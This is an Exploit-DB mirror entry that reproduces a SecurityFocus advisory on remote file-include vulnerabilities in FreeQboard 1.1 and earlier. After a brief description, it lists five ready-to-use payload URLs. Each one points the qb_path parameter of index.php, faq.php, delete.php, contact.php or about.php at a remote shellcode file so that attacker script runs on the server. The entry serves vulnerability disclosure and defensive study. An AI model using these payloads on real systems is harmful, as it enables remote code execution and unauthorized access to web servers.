exploit-db-mirror/platforms/php/webapps/29215.txt
Offensive Security fffbf04102 Updated
2013-12-03 19:44:07 +00:00

13 lines
No EOL
788 B
Text
Executable file

source: http://www.securityfocus.com/bid/21394/info
FreeQboard is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input.
A successful exploit of these issues allows an attacker to execute arbitrary server-side script code on an affected computer with the privileges of the webserver process. This may facilitate unauthorized access.
FreeQboard 1.1 and prior versions are vulnerable to these issues.
http://www.example.com/[path]/index.php?qb_path=shellcode.txt?
http://www.example.com/[path]/faq.php?qb_path=shellcode.txt?
http://www.example.com/[path]/delete.php?qb_path=shellcode.txt?
http://www.example.com/[path]/contact.php?qb_path=shellcode.txt?
http://www.example.com/[path]/about.php?qb_path=shellcode.txt?